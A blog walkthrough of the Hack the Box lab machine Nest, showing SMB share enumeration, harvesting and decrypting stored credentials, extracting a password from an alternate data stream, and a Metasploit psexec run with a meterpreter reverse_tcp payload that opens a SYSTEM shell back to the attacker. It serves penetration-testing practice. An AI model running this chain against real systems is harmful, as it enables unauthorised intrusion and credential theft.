# HTB Nest Walkthrough Jul 30, 2020 | nanobyte This is one of my favorite Hack the Box machines, throughout my time completing them! I absolutely enjoyed every minute of this box. My first NMAP scan, running with multiple flags, failed. I performed a simple nmap scan, and it returned only one port open: ``` 123456789nmap 10.10.10.178 Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-28 09:25 CST Nmap scan report for 10.10.10.178 Host is up (0.043s latency). Not shown: 999 filtered ports PORT STATE SERVICE 445/tcp open microsoft-ds Nmap done: 1 IP address (1 host up) scanned in 5.41 seconds ``` In the above, with port 445 open, I then ran a scan against SMB. Server Message Block (also known as Samba) is a way for Windows to share files, printers, serial ports and communications abstractions such as named pipes and mail slots between computers. ``` 123456789101112smbclient -L //10.10.10.178Enter WORKGROUP\root's password: Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin C$ Disk Default share Data Disk IPC$ IPC Remote IPC Secure$ Disk Users Disk SMB1 disabled -- no workgroup available ``` The smbclient command showed that there were several network shares. Smbclient is a tool used for Samba, providing a ftp-like experience for users. I went through and connected to each, and found that I was able to login and find possible Usernames in the `Users` share. I took note of this, as this information is sure to come up later for this box: ``` 12345678910111213smbclient \\\\10.10.10.178\\UsersEnter WORKGROUP\root's password: smb: \> dir . D 0 Sat Jan 25 17:04:21 2020 .. D 0 Sat Jan 25 17:04:21 2020 Administrator D 0 Fri Aug 9 10:08:23 2019 C.Smith D 0 Sun Jan 26 01:21:44 2020 L.Frost D 0 Thu Aug 8 12:03:01 2019 R.Thompson D 0 Thu Aug 8 12:02:50 2019 TempUser D 0 Wed Aug 7 17:55:56 2019 10485247 blocks of size 4096. 6449754 blocks available ``` I did attempt to access the user share listed, but access was denied for each of the directories. Continuing my enumeration of the network shares, I connected to `Data`, and found I could login to the `Shared` directory: ``` 123456789101112131415161718192021smbclient \\\\10.10.10.178\\DataEnter WORKGROUP\root's password: Try "help" to get a list of possible commands.smb: \> dir . D 0 Wed Aug 7 17:53:46 2019 .. D 0 Wed Aug 7 17:53:46 2019 IT D 0 Wed Aug 7 17:58:07 2019 Production D 0 Mon Aug 5 16:53:38 2019 Reports D 0 Mon Aug 5 16:53:44 2019 Shared D 0 Wed Aug 7 14:07:51 2019 10485247 blocks of size 4096. 6449754 blocks availablesmb: \Reports\> cd ..\Sharedsmb: \Shared\> dir . D 0 Wed Aug 7 14:07:51 2019 .. D 0 Wed Aug 7 14:07:51 2019 Maintenance D 0 Wed Aug 7 14:07:32 2019 Templates D 0 Wed Aug 7 14:08:07 2019 10485247 blocks of size 4096. 6449754 blocks available ``` In this directory, I found a file, `Maintenance Alerts.txt`. I used the get command to downlaod the file to my local box, and on my Kali Linux viewed the file: ``` 12345678910111213smb: \Shared\Maintenance\> dir . D 0 Wed Aug 7 14:07:32 2019 .. D 0 Wed Aug 7 14:07:32 2019 Maintenance Alerts.txt A 48 Mon Aug 5 18:01:44 2019 10485247 blocks of size 4096. 6449754 blocks available smb: \Shared\Maintenance\> get "Maintenance Alerts.txt"getting file \Shared\Maintenance\Maintenance Alerts.txt of size 48 as Maintenance Alerts.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)root@bhax0r:~# cat 'Maintenance Alerts.txt'There is currently no scheduled maintenance work ``` However, still nothing! I then went up one directory, and logged into the `Templates` directory and found another file, `Welcome Email.txt`. This sounded promising: ``` 1234567891011121314151617181920212223242526smb: \Shared\Templates\HR\> dir . D 0 Wed Aug 7 14:08:01 2019 .. D 0 Wed Aug 7 14:08:01 2019 Welcome Email.txt A 425 Wed Aug 7 17:55:36 2019 10485247 blocks of size 4096. 6449754 blocks availablesmb: \Shared\Templates\HR\> get "Welcome Email.txt"getting file \Shared\Templates\HR\Welcome Email.txt of size 425 as Welcome Email.txt (2.4 KiloBytes/sec) (average 0.9 KiloBytes/sec)root@hax0r:~# cat 'Welcome Email.txt' We would like to extend a warm welcome to our newest member of staff, You will find your home folder in the following location: \\HTB-NEST\Users\If you have any issues accessing specific services or workstations, please inform the IT department and use the credentials below until all systems have been set up for you.Username: TempUserPassword: welcome2019Thank you ``` And I found a possible set of credentials, tempuser:welcome2019! Noting the `Users` directory earlier, I logged back in with these credentials to that network share: ``` 1234567891011121314151617smbclient \\\\10.10.10.178\\Users -U TempUserEnter WORKGROUP\TempUser's password: Try "help" to get a list of possible commands.smb: \> cd TempUsersmb: \TempUser\> dir . D 0 Wed Aug 7 17:55:56 2019 .. D 0 Wed Aug 7 17:55:56 2019 New Text Document.txt A 0 Wed Aug 7 17:55:56 2019 10485247 blocks of size 4096. 6449754 blocks available smb: \TempUser\> get "New Text Document.txt"getting file \TempUser\New Text Document.txt of size 0 as New Text Document.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)root@hax0r:~# cat 'New Text Document.txt' ``` However, this did not have any further information for me. I then attempted to login to the `Users` share with the other usernames, using the same password (users don’t always change default passwords) but this approach also did not work. So, I moved on and used these credentials agaisnt other shares. I did find that it allowed me into `Secure$`: ``` 123456789101112smbclient \\\\10.10.10.178\\Secure$ -U TempUserEnter WORKGROUP\TempUser's password: Try "help" to get a list of possible commands.smb: \> dir . D 0 Wed Aug 7 18:08:12 2019 .. D 0 Wed Aug 7 18:08:12 2019 Finance D 0 Wed Aug 7 14:40:13 2019 HR D 0 Wed Aug 7 18:08:11 2019 IT D 0 Thu Aug 8 05:59:25 2019 10485247 blocks of size 4096. 6449738 blocks available ``` But, there was nothing within that network share that I could use to my advantage. Moving on, I was able to log into the `Data` share with the tempuser credentials. I was able to find two interesting files in this share, `RU_config.xml` and `config.xml`: ``` 1234567891011121314151617 smb: \IT\Configs\RU Scanner\> ls . D 0 Wed Aug 7 15:01:13 2019 .. D 0 Wed Aug 7 15:01:13 2019 RU_config.xml A 270 Thu Aug 8 14:49:37 2019 10485247 blocks of size 4096. 6449935 blocks availablesmb: \IT\Configs\RU Scanner\> get RU_config.xml getting file \IT\Configs\RU Scanner\RU_config.xml of size 270 as RU_config.xml (1.5 KiloBytes/sec) (average 17.6 KiloBytes/sec)root@hax0r:~# cat RU_config.xml 389 c.smith fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE= ``` ``` 12345678910111213141516171819smb: \IT\Configs\NotepadPlusPlus\> ls . D 0 Wed Aug 7 14:31:37 2019 .. D 0 Wed Aug 7 14:31:37 2019 config.xml A 6451 Wed Aug 7 18:01:25 2019 shortcuts.xml A 2108 Wed Aug 7 14:30:27 2019 10485247 blocks of size 4096. 6449935 blocks availablesmb: \IT\Configs\NotepadPlusPlus\> get config.xml getting file \IT\Configs\NotepadPlusPlus\config.xml of size 6451 as config.xml (37.5 KiloBytes/sec) (average 23.4 KiloBytes/sec)root@hax0r:~# cat config.xml... ... ``` Neither of these looked like much at first, but there is relevant and important information. FIrst off, we have a username and password from the `RU_config.xml`. The second can be easily missed, and this is the second `File filename` variable in `config.xml`. I can see that in the network share `Secure$`, there is a `Carl` directory within the `IT` directory. In the `RU_config.xml`, there is a `c.smith` password, can this be Carl!? I logged in and attempted to see if I could get to the `Carl` directory: ``` 123456789101112131415161718192021smbclient \\\\10.10.10.178\\Secure$ -U TempUser Enter WORKGROUP\TempUser's password: welcome2019Try "help" to get a list of possible commands. smb: \> dir . D 0 Wed Aug 7 18:08:12 2019 .. D 0 Wed Aug 7 18:08:12 2019 Finance D 0 Wed Aug 7 14:40:13 2019 HR D 0 Wed Aug 7 18:08:11 2019 IT D 0 Thu Aug 8 05:59:25 2019 10485247 blocks of size 4096. 6449738 blocks available smb: \> cd IT smb: \IT\> dir NT_STATUS_ACCESS_DENIED listing \IT\* smb: \IT\> cd Carl smb: \IT\Carl\> dir . D 0 Wed Aug 7 14:42:14 2019 .. D 0 Wed Aug 7 14:42:14 2019 Docs D 0 Wed Aug 7 14:44:00 2019 Reports D 0 Tue Aug 6 08:45:40 2019 VB Projects D 0 Tue Aug 6 09:41:55 2019 ``` And that worked! Note above, that when I was in the `Secure$\IT directory`, I could not list the contents. However, I could still change into the `Carl` directory. Awesome! Enumerating these files, I found a `RUScanner` in `VB Projects` direcory: ``` 1234567891011121314 smb: \IT\Carl\VB Projects\WIP\RU\RUScanner\> dir . D 0 Wed Aug 7 17:05:54 2019 .. D 0 Wed Aug 7 17:05:54 2019 bin D 0 Wed Aug 7 15:00:11 2019 ConfigFile.vb A 772 Wed Aug 7 17:05:09 2019 Module1.vb A 279 Wed Aug 7 17:05:44 2019 My Project D 0 Wed Aug 7 15:00:11 2019 obj D 0 Wed Aug 7 15:00:11 2019 RU Scanner.vbproj A 4828 Fri Aug 9 10:37:51 2019 RU Scanner.vbproj.user A 143 Tue Aug 6 07:55:27 2019 SsoIntegration.vb A 133 Wed Aug 7 17:05:58 2019 Utils.vb A 4888 Wed Aug 7 14:49:35 2019 10485247 blocks of size 4096. 6449951 blocks available' ``` Looking at the `Utils.vb` file, there are encrypting and decrypting functions. Looking at how these functions work, there is reference to symmetric key creation, using Rfc2898DeriveBytes. Instead of trying to break this encryption, I took the complete file structure, and copied to a Windows machine. Once I had it locally, I was able to compile the code using Visual Studio. Once compiled and I attempted to run the file, there was an error message: ``` 1Unhandled Exception: System.IO.FileNotFoundException: Could not find file 'C:\Users\adalzell\Desktop\Nest\RUScanner\bin\Debug\RU_Config.xml' ``` Having `RU_config.xml` file, which contains the hash string that looked like base 64, I placed that file into the directory, and when I ran it, the program ran without any exception errors. I then placed a single line of code to write to console the Plain Text in the `Utils.vb` decrypt function: ``` 12345Public Shared Function Decrypt(ByVal cipherText As String, _... Console.WriteLine(plainText) Return plainText... ``` And with that, when I compiled the code again, I could see the plain text password: ``` 12\RUScanner\bin\Debug>DbPof.exexRxRxPANCAK3SxRxRx ``` Now, I am able to connect to the `Users` share and own user: ``` 1234567891011121314151617smbclient \\\\10.10.10.178\\Users -U C.SmithEnter WORKGROUP\C.Smith's password: xRxRxPANCAK3SxRxRxsmb: \> cd C.Smithsmb: \C.Smith\> ls . D 0 Sun Jan 26 01:21:44 2020 .. D 0 Sun Jan 26 01:21:44 2020 HQK Reporting D 0 Thu Aug 8 18:06:17 2019 user.txt A 32 Thu Aug 8 18:05:24 2019 10485247 blocks of size 4096. 6449757 blocks availablesmb: \C.Smith\> get user.txtgetting file \C.Smith\user.txt of size 32 as user.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)root@hax0r:~# cat user.txt xxxxxxxxxxxxxxx4fd827e05f426e987 ``` Now to move on to own root. I looked in the `HQK Reporting` directory, and found a password file: ``` 12345678smb: \C.Smith\HQK Reporting\> ls . D 0 Thu Aug 8 18:06:17 2019 .. D 0 Thu Aug 8 18:06:17 2019 AD Integration Module D 0 Fri Aug 9 07:18:42 2019 Debug Mode Password.txt A 0 Thu Aug 8 18:08:17 2019 HQK_Config_Backup.xml A 249 Thu Aug 8 18:09:05 2019 10485247 blocks of size 4096. 6449725 blocks available ``` But, it was empty. That would have been to easy! However, looking at the file attributes, there is a stream associated to it, so I copied of the Alternate Data Stream (ADS) to get the password file: ``` 123456789101112131415smb: \C.Smith\HQK Reporting\> allinfo "Debug Mode Password.txt"altname: DEBUGM~1.TXTcreate_time: Thu Aug 8 06:06:12 PM 2019 CDTaccess_time: Thu Aug 8 06:06:12 PM 2019 CDTwrite_time: Thu Aug 8 06:08:17 PM 2019 CDTchange_time: Thu Aug 8 06:08:17 PM 2019 CDTattributes: A (20)stream: [::$DATA], 0 bytesstream: [:Password:$DATA], 15 bytessmb: \C.Smith\HQK Reporting\> get "Debug Mode Password.txt:Password"root@hax0r:~# cat "/root/Debug Mode Password.txt:Password" WBQ201953D8w ``` With this password, I can telnet into the box and enable Debug: ``` 12345678910telnet 10.10.10.178 4386Trying 10.10.10.178...Connected to 10.10.10.178.Escape character is '^]'.HQK Reporting Service V1.2>debug WBQ201953D8wDebug mode enabled. Use the HELP command to view additional commands that are now available ``` Still connected with this telnet session, I enumerated and going up one directory, in the LDAP directory, I found a config file: ``` 1234567891011121314151617>list Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command QUERY FILES IN CURRENT DIRECTORY[1] HqkLdap.exe[2] Ldap.confCurrent Directory: LDAP>showquery 2Domain=nest.localPort=389BaseOu=OU=WBQ Users,OU=Production,DC=nest,DC=localUser=AdministratorPassword=yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4= ``` Using the `RU_config.xml` I attempted to decrypt returned a padding error. Looking further into the `KqdLdap.exe`, I found the following code in the `CR` function: ``` 12345678' HqkLdap.CR' Token: 0x06000012 RID: 18 RVA: 0x00002278 File Offset: 0x00000678Public Shared Function DS(EncryptedString As String) As String If String.IsNullOrEmpty(EncryptedString) Then Return String.Empty End If Return CR.RD(EncryptedString, "667912", "1313Rf99", 3, "1L1SA61493DRV53Z", 256)End Function ``` This is a different set of encryption, different IV, string, and iteration. So, I placed this into the Decryption function of DbPof.exe, and with the administrator hash in the `RU_config.xml` file, I reran the DbProf.exe program from command prompt, and got the administrator password! ``` 12DbPof.exeXtH4nkS4Pl4y1nGX ``` I connected to SMB Share, but there was a shortcut link to the admins desktop. This was no good. So, I used metasploit (after multiple failed attempts with evil-winrm, impacket psexec.py, and winexec) psexec with reverse\_tcp payload: ``` 1234567891011121314151617181920212223242526272829303132333435363738394041424344msf5 > use exploit/windows/smb/psexecmsf5 exploit(windows/smb/psexec) > set payload windows/meterpreter/reverse_tcppayload => windows/meterpreter/reverse_tcp msf5 exploit(windows/smb/psexec) > set LHOST 10.10.14.13LHOST => 10.10.14.13msf5 exploit(windows/smb/psexec) > set LPORT 4538LPORT => 4538msf5 exploit(windows/smb/psexec) > set RHOSTS 10.10.10.178RHOSTS => 10.10.10.178msf5 exploit(windows/smb/psexec) > set SMBUserSMBUser => msf5 exploit(windows/smb/psexec) > set SMBUser AdministratorSMBUser => Administratormsf5 exploit(windows/smb/psexec) > set SMBPass XtH4nkS4Pl4y1nGXSMBPass => XtH4nkS4Pl4y1nGXmsf5 exploit(windows/smb/psexec) > exploit[*] Started reverse TCP handler on 10.10.14.13:4538 [*] 10.10.10.178:445 - Connecting to the server...[*] 10.10.10.178:445 - Authenticating to 10.10.10.178:445 as user 'Administrator'...[*] 10.10.10.178:445 - Selecting PowerShell target[*] 10.10.10.178:445 - Executing the payload...[+] 10.10.10.178:445 - Service start timed out, OK if running a command or non-service executable...[*] Sending stage (180291 bytes) to 10.10.10.178[*] Meterpreter session 1 opened (10.10.14.13:4538 -> 10.10.10.178:49157) at 2020-01-29 14:28:29 -0600meterpreter > shellProcess 1456 created.Channel 1 created.Microsoft Windows [Version 6.1.7601]Copyright (c) 2009 Microsoft Corporation. All rights reserved.C:\Windows\system32>whoamiwhoamint authority\systemC:\Windows\system32>cd C:\users\administrator\desktopcd C:\users\administrator\desktopC:\Users\Administrator\Desktop>more root.txtmore root.txtxxxxxxxxxxxxxxxxxxx08a42f0b94b878c41 ``` And rooted this box! The name, Nest, really fits this complex set of steps, nesting each step to proceed. Thanks for reading!\ \